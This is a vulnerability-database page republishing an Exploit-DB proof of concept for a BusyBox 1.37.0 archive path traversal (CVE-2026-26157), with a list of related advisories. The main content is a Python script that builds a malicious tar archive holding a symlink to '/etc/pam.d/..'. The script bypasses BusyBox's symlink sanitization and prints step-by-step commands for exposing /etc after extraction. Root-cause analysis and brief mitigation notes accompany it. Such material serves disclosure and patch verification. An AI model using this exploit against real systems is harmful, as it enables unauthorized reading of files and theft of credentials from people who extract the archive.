Vulners
Lucene search
📄 BusyBox 1.37.0 Path Traversal
| Reporter | Title | Published | Views | Family All 52 |
|---|---|---|---|---|
 | CVE-2026-26157 | 11 Feb 202620:27 | – | attackerkb |
 | CVE-2026-26157 affecting package busybox for versions less than 1.35.0-17 | 19 Feb 202622:21 | – | cbl_mariner |
| CVE-2026-26157 affecting package busybox for versions less than 1.36.1-22 | 24 Feb 202601:08 | – | cbl_mariner |
 | CVE-2026-26157 | 12 Mar 202612:17 | – | circl |
 | BusyBox 安全漏洞 | 11 Feb 202600:00 | – | cnnvd |
 | CVE-2026-26157 | 11 Feb 202620:27 | – | cve |
 | CVE-2026-26157 Busybox: busybox: arbitrary file overwrite and potential code execution via incomplete path sanitization | 11 Feb 202620:27 | – | cvelist |
 | CVE-2026-26157 | 11 Feb 202620:27 | – | debiancve |
 | BusyBox 1.37.0 - Path Traversal | 30 Apr 202600:00 | – | exploitdb |
 | CVE-2026-26157 | 11 Feb 202621:16 | – | nvd |
10
# Exploit Title: BusyBox 1.37.0 - Path Traversal
# Google Dork: N/A
# Date: 2026-02-11
# Exploit Author: Calil Khalil
# Vendor Homepage: https://busybox.net
# Software Link: https://busybox.net/downloads/
# Version: BusyBox 1.36.1, 1.37.0
# Tested on: Ubuntu 22.04 LTS, Alpine Linux 3.19
# CVE: CVE-2026-26157
"""
BusyBox Path Traversal Vulnerability (CVE-2026-26157)
Description:
BusyBox archive extraction utilities fail to properly sanitize symlink targets
containing trailing ".." components. The strip_unsafe_prefix() function in
archival/libarchive/unsafe_prefix.c uses strstr(cp, "/../") which only matches
the 4-character pattern and misses 3-character trailing "/.." sequences.
This allows an attacker to craft malicious archives with symlinks pointing to
arbitrary filesystem locations, enabling information disclosure through symlink
traversal.
Affected Components:
- tar (primary vector)
- unzip
- rpm
- ar
Impact:
- CVSS Score: 7.8 (HIGH)
- Arbitrary file read via symlink traversal
- Information disclosure
- Credential theft
Root Cause:
archival/libarchive/unsafe_prefix.c:23
The pattern matching in strip_unsafe_prefix() fails on trailing ".." paths:
cp2 = strstr(cp, "/../"); // Only matches "/../", misses "/pam.d/.."
if (!cp2) break;
Attack Scenario:
1. Attacker creates TAR archive with symlink: sensitive_data -> /etc/pam.d/..
2. Victim extracts archive using BusyBox tar
3. Symlink created without sanitization
4. Symlink resolves to /etc directory
5. Application reading 'sensitive_data' exposes /etc contents
References:
- https://github.com/calilkhalil/research
- Red Hat CNA Case: INC3907198
"""
import tarfile
import sys
import os
def create_exploit():
"""
Creates a malicious TAR file exploiting CVE-2026-26157.
The archive contains a symlink with an unsanitized target that
resolves outside the extraction directory.
"""
exploit_file = 'CVE-2026-26157_exploit.tar'
try:
with tarfile.open(exploit_file, 'w') as tar:
# Create symlink with trailing ".." in target path
# This bypasses strip_unsafe_prefix() pattern matching
info = tarfile.TarInfo('sensitive_data')
info.type = tarfile.SYMTYPE
info.linkname = '/etc/pam.d/..' # Resolves to /etc
tar.addfile(info)
print(f"[+] Exploit created: {exploit_file}")
print(f"\n[*] Exploitation steps:")
print(f" 1. mkdir test_extraction && cd test_extraction")
print(f" 2. busybox tar xf ../{exploit_file}")
print(f" 3. readlink -f sensitive_data")
print(f" Expected output: /etc")
print(f" 4. ls sensitive_data/")
print(f" Result: Lists /etc directory contents")
print(f"\n[!] Impact: Arbitrary directory read via symlink traversal")
print(f"[!] CVSS: 7.8 HIGH (AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)")
return exploit_file
except Exception as e:
print(f"[-] Error creating exploit: {e}")
sys.exit(1)
def show_technical_details():
"""Display technical analysis of the vulnerability"""
print("\n" + "="*70)
print("TECHNICAL ANALYSIS - CVE-2026-26157")
print("="*70)
print("\nVulnerable Function:")
print(" archival/libarchive/unsafe_prefix.c:strip_unsafe_prefix()")
print("\nVulnerable Code Pattern:")
print(" cp2 = strstr(cp, \"/../\"); // Only matches 4-char sequence")
print(" if (!cp2) break;")
print("\nBypass Technique:")
print(" Path: /etc/pam.d/..")
print(" Pattern check: strstr(\"/etc/pam.d/..\", \"/../\") -> NULL")
print(" Result: Sanitization bypassed, symlink created with original target")
print("\nExploitation Flow:")
print(" 1. Archive contains: symlink 'sensitive_data' -> '/etc/pam.d/..'")
print(" 2. get_header_tar() extracts symlink metadata")
print(" 3. Symlink target NOT sanitized (bypass detected)")
print(" 4. data_extract_all() creates symlink with '/etc/pam.d/..'")
print(" 5. Target resolves: /etc/pam.d/.. -> /etc")
print(" 6. Reading 'sensitive_data' = reading /etc")
print("="*70 + "\n")
if __name__ == "__main__":
print("="*70)
print("BusyBox Path Traversal Exploit - CVE-2026-26157")
print("Author: Calil Khalil")
print("="*70)
# Display technical analysis
show_technical_details()
# Create exploit
exploit_file = create_exploit()
print("\n[*] Mitigation:")
print(" - Update BusyBox to patched version")
print(" - Patch applies strip_unsafe_prefix() to symlink targets")
print(" - Do not extract untrusted archives with elevated privileges")
print("\n[*] For educational and authorized testing purposes only")Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
05 May 2026 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 3.17
EPSS0.00114
SSVC